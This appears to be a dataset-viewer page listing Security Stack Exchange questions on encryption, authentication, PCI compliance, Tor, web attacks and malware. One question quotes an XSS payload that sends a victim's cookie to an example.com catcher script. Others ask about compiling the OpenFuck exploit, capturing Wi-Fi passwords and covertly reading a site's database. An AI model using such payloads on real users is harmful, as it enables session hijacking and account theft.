instruction stringlengths 24 29.9k |
|---|
This would probably require knocking on people's doors, but — couldn't the endpoint ask the exit node what the relay node was, and then ask the relay node what the entry node was, and then ask the entry node what the origin was?
Is it just not logged long enough for the NSA etc. to show up at the Tor nodes' doors?
I am... |
Perhaps I am being both naive and overly ambitious in my first post but I have a huge interest in learning about network and system security and am at a loss as to where to begin. I realize that stack exchange sites are not too keen on having large broad sweeping questions with potentially opinionated answers, but I th... |
I recently had been wondering if there is a way to erase my LUKS keys from RAM before I suspend my device (usually a laptop) to S3 mode. I am interested in a solution that would work for my / partition. The way I imagine this, I'd like my system to ask me for password again when I resume it.
If such a solution does not... |
Recently my Drupal site on a Linux server has been targeted by session hijacking attacks. I guess the attacks were originated from images containing malicious code which where uploaded to the web root because I have found some of the crafted images by looking at uploaded files.
So I am wondering how best to find all t... |
On a typical day in the internet, there would be numerous botnets commanding zombie computers to scan for servers with vulnerabilities. Every now and then, a new exploit would be discovered. Then, the zombie computers would be reprogrammed to look for the new flaw. If a server is not updated immediately when an exploit... |
I used to use a master password and "Windows User Account" to get into my password datasbase with Keepass 2. Then I realized the "Windows User Account" option is garbage because if you ever want to upgrade, migrate, reinstall the OS then the database is lost. So now I use the master password and a key file.
My question... |
I have a general security question:
Let's say there is a client-server application with authorisation by login and password using a secure connection between server and client (https). User can have different permissions that allow user to access to different kind of information provided by the server. This is only a p... |
I know there have been questions on this in the past but they all seem quite outdated, or not that specifically relevant.
I need to use a 1394(Firewire) connection, however am concerned with possible DMA vulnerabilities. From my understanding a firewire device could spoof the amount of memory it requires access to, suc... |
I understand what an SSL certificate does but I need help evaluating if I need one for my client's website.
His website sells holiday packages online but does so without asking for any credit card information. When the visitor tries to book a package, he is sent to a bank's third party gateway where he submits his info... |
I have just inherited a running wordpress installation from another agency and the theme (twentyeleven) they are using for my client has been corrupted. This is what most of the theme's php files looks like at the beginning of the file:
What kind of attack is this? How do I identify it? And what steps should I take no... |
I am trying to determine if hosts are up. For hosts where a ping fails, I run a Nmap (6.40) Regular and/or Quick Scan. For a subset of my hosts, the Nmap response is "Host seems down". As a follow up per the Nmap response, I run the no ping port scan -Pn.
For the -Pn scans, on the 10-15 different hosts I have tried, t... |
I heard of the recent research that claims to have made possible the sniffing of even 4096-bit GPG keys under certain conditions. What is the impact of this vulnerability for home users? If this is a real risk, how can one protect against it?
Also, I heard that this vulnerability was recently fixed. How does the fix wo... |
I wanted to know which language should i chose if i want to have a career in information security later on (about to get into college). I have even read that c dominates c++ and if that is the case is it tough switching between the syntax of the two?. I would also appreciate if you could mention some sites where i can ... |
openssl_pkcs7_encrypt() requires the data to be encrypted to be read from a file and so unfortunately it requires sensitive data to be written to temporary file before being encrypted.
In a shared hosting environment, what steps can I take to minimise the risk of the sensitive data being read / stolen when having to mo... |
So, I used the crypto module in node.js to implement a secure key generator and encrypt/decrypt functions. Knowing that security's best friend is a spotlight on the implementation, I want to throw it out here and make sure I didn't fall into any holes.
A little about my use case: I'm building an app that communicates ... |
Assuming you have a block cipher that (when given a 128-bit key) yields an instance of a true pseudorandom permutation... how can you use that block cipher within the above constraints to achieve practically perfect secrecy?
|
I want nginx to deny users who have folders inside /webroot/uploads
e.g.
/webroot/uploads/user1
/webroot/uploads/user2
/webroot/uploads/user999
to execute any shell (php, pl, py, binary).
The shells are often hidden in jpg or gif files. like badfile.php.jpg
I also see malacious binary files being uploaded to the folde... |
Many of my users today got email from docs#@mydomain.com (where docs# was between docs0 and docs8 or so, and mydomain.com is obviously changed from my real domain name), with the sender name of "Administrator." The message had subject "New Voice message" and message: "You have received a voice mail message. Message l... |
Summary
Once a user logs into a web site and his username/password credentials are verified and an active session is established, is it possible to avoid hitting the DB for each and every request from that user? What is the recommended method of securely authenticating subsequent requests for the life of the session, w... |
Let's assume there is a database containing names and each name is hashed and the clear-text is deleted.
If an attacker were to steal this database, would he/she be able to get the list of names?
|
I am in the very early stages of making my application FIPS 140-2 compliant... so early in fact that I am not sure what level it has to be... just writing a preliminary recommendations document at this point. However, I am fairly certain that the level will end up being either 1 or 2; so if it's not too much trouble, p... |
The diagram below is a thought experiment that could provide a certain level of privacy to mobile (smart)phone users, beyond what they currently have. Some of it is purely theoretical, but it should nonetheless be possible.
I would love some thoughts/advice/criticism on this:
Short explanation
The users phone has al... |
I'm trying to find some vulnerable points in my website. My website like, www.example.com/index.php?menu_id=1002&news_id=5. When i trying to find these points with sql map, it tries for menu id. But i want to check the news id. Is that possible?
|
If I have an important data in a disk (flash, SSD or HDD) and I deleted them, I know it is easy to recover these deleted data (even by using free software like recuva. Now if I fill this disk with any data, let's say a large movie file or so until the disk has no more empty space then deleting these dummy files again, ... |
I'm not particularly well versed in IT security so please bear with me.
I recently discovered that my bank's online system will accept passwords that consist of the correct password, and a string of random characters. So for example, if my password is "password", it will accept things like "password1" or "password4343... |
According to PCI-DSS 3.4 Requirement:
Render PAN unreadable anywhere it is stored by using the below methods:
One-way hash
Truncation
Index tokens and pads
Strong cryptography with associated key-management processes and procedures
My question based on above requirement is:
So if need to encrypt the credit card deta... |
The question is simple. For example, we access a database of any website. And looked up for datas. So, is the website owner can see me? If he/she can see, how can i protect?
[These are for security of course. I'm trying to think as the bad boy]
Thanks for answering.
|
I'm practicing in VM following the OWASP guide. I know that is possible to steal the cookie by redirecting to "False" page etc. but I would like to steal the cookie without redirecting on another page.
So, if you have some guestbook and then you put:
document.location= "http://www.example.com/cookie_catcher.php?c=" + d... |
Is there any comparison of bcrypt versus scrypt? I am particularly interested in how bcrypt(10) bcrypt(20) or even bcrypt(30) scales in comparison to scrypt(1)?
|
On our forgot password reset form, is it ok to leak that a given e-mail address entered is invalid? Or should we always just return success and check your e-mail, even if the e-mail is not valid.
I feel like always returning success can provide a bad user experience, i.e. if a user is trying to remember which e-mail th... |
History
I got an email this afternoon to my gmail from "paypal@e.paypal.com" with mailed-by: na.e.paypal.com and signed-by: e.paypal.com. Gmail did not report it as spam/phishing/suspicious and it went straight to my inbox, so the MX records must check out.
The email effectively linked to this url.
The URL, when click... |
I have an internal network of IP network cameras. The feeds from these cameras are ingested by a single server and presented from a unified web interface both internally and to the outside world (both after password screening).
There are two layers of protection - one fairly simple one at the barrier to the WAN that de... |
I have an app server and a db server. I want to send certain data to the db encrypted, using a DEK (data encryption key). Ideally, this DEK is read protected on the linux file system and encrypted using a KEK (key encryption key). On Windows, I would use DPAPI to protect the KEK, but on Linux, I am unsure the best way ... |
Here where I live, it is believed that all the internet traffic goes through the hands of government agencies, and the telecommunication office is actually owned by the government.
Given the situation, I have some concerns:
Can government agencies tamper with the websites that use HTTPS? How secure is the login data ... |
With products such as LastPass that store encrypted passwords on remote servers, what are the associated risks that aren't applicable to locally stored and encrypted passwords? If something is encrypted well enough, it's unlikely anyone would be able to break the encryption no matter how much processing power they have... |
I did a search and didn't quite find an answer to my question.
I have website that is integrating with a 3rd party for eCommerce and CRM. On my side I am collecting no data. I don't collect any login data, customer data or anything. To retrieve any data I need to log in to their site.
My site pulls various forms from ... |
Say I have strings: stringA, StringB, stringC.
And I make two hashes:
HashA = sha256(stringA + stringB)
HashB = sha256(stringB + stringC)
For the sake of the argument I'm suggesting sha256 but answering the question generically is just as good.
I'm not a strong mathematician, but suppose I were, and am trying to revers... |
After an IT audit of my company, the report said that our Active Directory contained too many non-personal user accounts. This caused a risk of misuse and unauthorized user access.
I checked my company's Active Directory today and noticed a lot of non-personal user accounts, but most of them seem to be related to syste... |
Let's consider two Encryption keys:
1.Data-Encryption-Key(DEK)
2.Key-Encryption-Key(KEK)
KEK will be securely stored in HSM, which will be encrypted using master key. Data Encryption Key will be decrypted using KEK.
Based on the above concept, my doubts are:
Do we need to send the Encrypted DEK to the HSM for decryptin... |
I was talking earlier to a script kiddie and claimed that IP spoofing can increase the upload speed in a DDOS attack?! that does not make any sense to me
According to him if your server has an upload speed of 1Gbps IP Spoofing will help you strike a target with a 10Gbps DDOS attack, any explanation?
Thank you for your... |
This discussion does not include self-signed end entity certificates for hosts like web servers and mail servers.
OpenSSL's default configuration for a CA certificate has the following keyUsage:
cRLSign
keyCertSign
The Federal Public Key Infrastructure (PKI) X.509 Certificate and CRL Extensions Profile has the follow... |
We would like to start using digital signatures and possibly encryption for e-mails in our company. My knowledge of public-key cryptography is entirely theoretical with no practical experience.
In public-key cryptography, e-mails or documents are signed with the signer's private key. It is crucial that the private key ... |
After the recent Target hack there has been talk about moving from credit cards with magnetic stripes to cards with a chip.
In what ways are chips safer than stripes?
|
I'm learning PHP and at the same time I write the examples that I get from the book to .php pages to test them and eventually publish them. My concern is about a bunch of forms that are there to test the codes; these are very basic forms that have no validation code and I would like to know if someone could do bad thin... |
When installing a new AIX server, there is a possibility to use several patterns for secure deletion.
My question: Is it necessary to use several patterns? What is the benefit from having several ones?
|
We are a company that has many web applications developed in ASP.NET. Our Internet service provider (Telefonica) wants to test our web sites looking for vulnerabilities. For that, they are asking us to provide them credentials (read-only access) for each web site.
It's the first time that I have heard that for testing ... |
Has there been any cases where hackers have taken over the phone number to a business, by creating a phone number in the same area code, setting up a virtual PBX / Asterisk system, routing all calls to the business, recording the conversations, and updating/hijacking Google/Bing/Yelp listings for the business with thei... |
I've been trying to find a way to secure a webpage that is easy to do (ie gaining access) yet still fairly secure. So, while a 4 char numeric password would be fairly quick to enter, it wouldnt be very secure, and a 4 char alphanumeric + symbols would take more time to enter in, but potentially be much more secure...
... |
With sales of smartphone on the ascend and PC sales on the decline, the demand for smartphones will soon outstrip the PC.
What will be some of the new major foreseeable security concerns present on the smartphone?
How do we protect ourselves against such security threats?
|
I have an Application Pool in IIS running under the standard AppPoolIdentity as part of the IIS_IUSRS group.
What are the security implications of granting AppPoolIdentity modify and create permissions in the intepub/wwwroot/website/ directory? Are there any ways to mitigate these risks?
In my particular instance, it i... |
Why are chips safer than magnetic stripes?
The answers to the above question explain that the chip based cards can not be cloned as the "secret number" is embedded in the chip and protected by the use of public key cryptography. The chip also performs some cryptographic operations to authenticate itself without reveali... |
I am trying to compile the following exploit http://pastebin.com/pxy4GiFQ to use it against one of my lab machines.
I am trying to compile it inside KALI machine and get the following error:
root@kali:~/Desktop# gcc -o OpenFuck abc.c -lcrypto
abc.c:22:26: fatal error: openssl rc4.h: No such file or directory
compilatio... |
I want to get the wrong password that a user enters at a wifi hotspot on android.
I just want to know if this is possible on android and if so how.
|
I'm on a work network, and I had some files I wanted to give to a colleague. I set up a shared folder and directed him to my computer name to open the shared folder. Then I remembered from a long time ago seeing C$, and tried I entering this:
\\COMPUTER-NAME\C$
Now, he got access to my computer. He could do everything... |
I am learning at school about attack signatures on web applications (basically OWASP), but I do not understand what they really are in this context. Can anybody give me some good references where I can better understand what they are and where they are used? Thanks!
|
In this thread:
Why are chips safer than magnetic stripes?
the answers all seem to be that the chip cards are far more secure and difficult to copy. Here is my problem, and my question. A couple of years back, there was a lot of talk about moving cards to a chip system - and a lot of counter talk about how INSECURE the... |
I have a few servers and machines that I regularly login to, so I was wondering if it was possible to secure them using a version of Shamir's Secret Sharing.
I thought if I could split my private key into a number of pieces, then distribute those pieces among each of the computers I use each day as well as a USB stick.... |
If I send messages using OTR & GPG, will my ISP or some surveillance agencies know that I'm using them? "Look, he's sending an encrypted message. He must have some important secret. Let's go rubber-hose him!"
Note:
Obviously, if they see the content of my messages (e.g. emails), they will know that they are encrypted. ... |
When having a rich text editor on a web application, what is the best way to escape HTML entities and prevent XSS attacks but keep the formatting (<b>, <i>, <u>, ...etc.) ?
|
I might be asking a similar question to this: Whitelisting DOM elements to defeat XSS
But I think my proposed solution is different and I was wondering if I could get the community to comment on whether it can be an effective way to prevent XSS attacks.
I am customizing a content management system that has a large cod... |
I've been working on a site that requires users to login. It's written in PHP with MySQL, and passwords are stored as Whirlpool hashes with a salt (source code later).
However, security sites or fellow developers have advised against this (actually, SHA-256, but the point remains) and have recommended bcrypt or PBKDF2.... |
I am a beginner in Reverse Engineering and am trying to improve my skill by participating in any CTF's I can and solving CrackMe's. I am trying to find out why Binary Exploitation and Reverse Engineering are always separated as two different topics.
My Question is simple:
Is Reversing different from Binary Exploitatio... |
Currently, there is an HTML form/input attribute called autocomplete, which, when set to off, disables autocomplete/autofill for that form or element.
Some banks seem to use this to prevent password managers from working. These days sites like Yahoo Mail seem to do it as well because they feel that password managers ar... |
Can somebody have stolen files and data from my desktop PC just by inserting a USB Flash drive in my computer, without dragging files over to the Flash drive?
|
LFI: Local file inclusion.
After going through many tutorials I have two things I can/t figure out:
checking the vulnerability: I don't understand what makes a website vulnerable or not. For example, in the stackexchange network itself we can make changes in the url:
https://security.stackexchange.com/questions/ask <... |
the RSA system uses a private key to read the content encrypted with the public key. If I make a game for mobile, and want to save the data :
I guess I cannot save the private key on the device.
If I use a server, and call a php function to send me the private key, the hacker could just intercept and read the private... |
Should I worry if a developer programmed an app to send IMEI / IMSI number of the phone where the app is installed back to him? What can an attacker do with such information?
|
If I understand correctly GSM uses A5/1 stream cipher. My question is why doesn't it use a stream cipher mode like OFB or CFB?
|
Suppose that I have a block cipher whose key size is 128 bits. but the block length is eight bits. Let E(m’) be an encryption oracle that encrypts by running our “short” block cipher in CBC mode.
How would I write pseudocode for an adversary, A(m), that, given E(m’), can probably decrypt any input in a reasonable amou... |
I would like to try to build a Virtualbox image to use with Vagrant. This is the features:
Login with SSH + 2FA (Google Auth)
No X
No internet connection
Copy unsigned transaction, sign it and broadcast from the external host
(Possible with the use of "Synced Folders")
What worries me is:
If the image was to be stole... |
I want to hide my home network behind a router and not worry about firewalls on internet-facing devices. Furthermore, one PC is going to be hosting some services, so I guess I need port forwarding as well. It would be also nice if this PC is somewhat detached from the LAN, so that if a breach is successful upon it, onl... |
I have been advised to use dd-wrt, for richness of features and heightened security.
The argument about security is that major manufacturers don't care much about the firmware, release with a lot of bugs and those become widely known. Consequently, just knowing the router model confers knowledge of many vulnerabilities... |
This classical paper of Paul van Oorschot: Revisiting Software Protection, mentions in section 3.4 that by employing software diversity "an exploit crafted to succeed on one instance will not necessarily work against a second" software instance.
I know that software diversity does not eliminate the possibility of re-ex... |
I'm a Linux user and I installed Windows recently, I need it for some software. I don't want to use any anti-malware programs, I don't plan on giving administrative rights to applications I don't trust - just like in Linux. So, in theory, getting a malware shouldn't be possible, right?
So, my question is, can I get inf... |
I'm trying to add a meterpreter plugin,
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Math magic to convert the binary to letters
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
test = letters[i,1]
rem = a % (2**(i+1))
if rem > 0
drives << test
a ... |
Mobile devices like smartphones and tablets have the feature to autoconnect to wireless networks of known name. The same is with laptops and other hardware using WPA2. Is it possible to:
a. Obtain the target hotspot name, like "john home network"
b. Setup a new wifi network with the same name by using e.g. Android adho... |
If I'm about to sell my iPhone 5, is there a way to make sure that the buyer won't be able to recover anything from my data? Both data that has been recently deleted and data that has been deleted long time ago.
|
Another theoretical question about Tor: Imagine I am running a dissident web site as a hidden service. How can I reduce the chances that I get caught?
Assume I am running the server from home, over a large ISP. Going to a small ISP seems too suspicious, and giving the server out of hand is way to dangerous.
I'm especia... |
I have a firewall VM which creates I have used to setup subnet for different purposes.
For example: (fake ips, of course)
1.1.2.1/24 DMZ
1.1.3.1/24 Internal
1.1.5.1/24 security/logging
I use dovecot,spamassassin,postfix, and apache on the mail server.
The DMZ has a mail/web server. The firewall and server use OpenSu... |
I have a PHP script that executes a bunch of commands to verify that a user is logged.
if (( isset ($password) && $password!="" && auth($password,$hidden_password)==1) || (is_array($_SESSION) && $_SESSION["logged"]==1 ) ){
$aff=display("you're logged in);
} else {
$aff=display("you're not logged in");
}
If reg... |
I am working on a web app with a sign up form like below. The validations are all done client side using http://formvalidator.net/.
I am well aware that client-side validations can be bypassed, but I have currently not bothered to implement server-side validations as they are much more painful to implement and require ... |
I understand that it's not possible to have Authentication Header with a regular NAT, because it messes with the IP header protected by AH. How about proxies? Do they change anything in the packet?
Would it be possible to use AH in transport mode on an IPSec channel between proxies?
|
I just read this post and it proposes a method of storing SSL fingerprints online so that you can double check that your certificates have not been tampered with.
But is it really relevant or useful? To me it does not seem to add any security: it lets you know that you are being snooped on, but doesn't protect you fro... |
I work as an application architect at larger company that builds web applications using both .Net and Java technologies. These are sold to and accessed by other businesses (not consumers). We have multiple application development teams working on these, including various skill levels of employees, contractors/consult... |
A few months ago I configured a test mail server on Amazon AWS, all legit. I used a new address to my catchall-domain (something similar to, but not exactly, test-config-aws-neptune-2014-08@my-domain.com).
I've now started getting spam mail to that very address. It is highly unlikely that a spammer would have 'guessed'... |
If I have a HTTP reverse proxy that communicates with it's backends in an untrusted datacenter, or across datacenters, I would want to use HTTPS in the backend, as talked about here:
Reverse Proxy Secure Configuration
How would these SSL certificates be set up though? I can hardly buy and install a new certificate ever... |
I can't really understand the concept of VPNs, since we already have various secure transmission protocols.
Isn't the point of VPNs that people using its 'channels' can send encrypted data to each other?
At the end, isn't it just one client and one server trying to exchange data securely?
We have SSL/TLS for that and m... |
I am developing an application and part of signing up requires a user to sign a contract agreement of using the service.
I have been reading around the subject for a few days, and I am fairly happy with all the techniques around digitally signing a document. Some references below
Digitally Sign DATA, Not Documents [clo... |
According to this article => http://www.howtogeek.com/166507/why-most-web-services-dont-use-end-to-end-encryption/
Gmail doesn't store the encryption key.
But Gmail reads whole of users' email for advertisement or other purpose like government! (Based on Mr.Snowden disclosure)
The idea of “end-to-end encryption” — you... |
Does anyone have thoughts on the potential damage of your online banking account being hacked? I'm not sure what a person could actually do since I think they could really only pay my bills (adding a new payee would require additional security information to set up). They might be able to see my account number I suppos... |
I'm trying to set up a honeyd system. How can I suppress the broadcast traffic seen by the outside interface, preferably without needing to resort to syslog filters?
User subnet 192.168.20.0/24, default route 192.168.20.1
HoneyD subnet 192.168.25.0/24. The IP used to reach here is 192.168.20.254.
The router has a st... |
This tool requires physical access of course, and there are many things you can do once you have physical access, but this peaked my curiosity.
The tool in question: https://www.kickstarter.com/projects/jontylovell/password-reset-key?ref=discovery
Obviously the magic to this piece of hardware is what's contained on it... |
I want to learn all about that. How can we inject code into an image? Is the code must be php? Or is javascript or HTML works too? How I find documentation about this article?
I'm a newbie about these type of topics. I want to be a pentester. So all your answers is very improtent for me. Thanks for help.
P.S: When i'm ... |
Since it is possible to fake the source IP of a packet, is it also possible to anonymize DDOS attacks?
|
I was looking at our authentication system which hashes passwords differently than I was taught. The salt is a constant byte array and it uses the password + the salt as a key for the password hashing algorithm.
public byte[] GetHash (string password)
{
var hmac = KeyedHashAlgorithm.Create("HMACSHA512");
hmac.K... |
I have an app that sends an encrypted message to the server, with the sender and recipient username attached. The usernames are each linked to a unique device ID that allows messages to be sent to them through the Google Cloud Messaging service.
My problem is that I'm not sure what the best way is to prevent anyone fro... |
If I create a TrueCrypt volume and secure it with a password and a keyfile, is there any way that someone who has access to my computer would be able to tell that the volume requires a keyfile to decrypt?
If not, then if I store the keyfile on my computer, along with thousands of other files, won't it be practically im... |
We are using Verizon's Home Phone Connect as a replacement for our AT&T landline. The problem is that somebody is using our phone to make dozens of calls each day to a series of toll free numbers. When I've dialed these numbers I get a fax signal once a connection is made. Has anyone else experienced this?
The phone... |
I'm considering the relative benefits/disadvantages of making a login page cacheable. Note that here I'm referring to the page containing the form into which the user enters their username and password.
Certainly it doesn't add any protection against SSL stripping (the HTTP page is treated as a seperate entity from the... |
I wanted to know if I can still be PCI compliant if I store card holder and PII information for multiple tenants in the same database? I.e., have an identifier on the table level to identify the tenant?
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.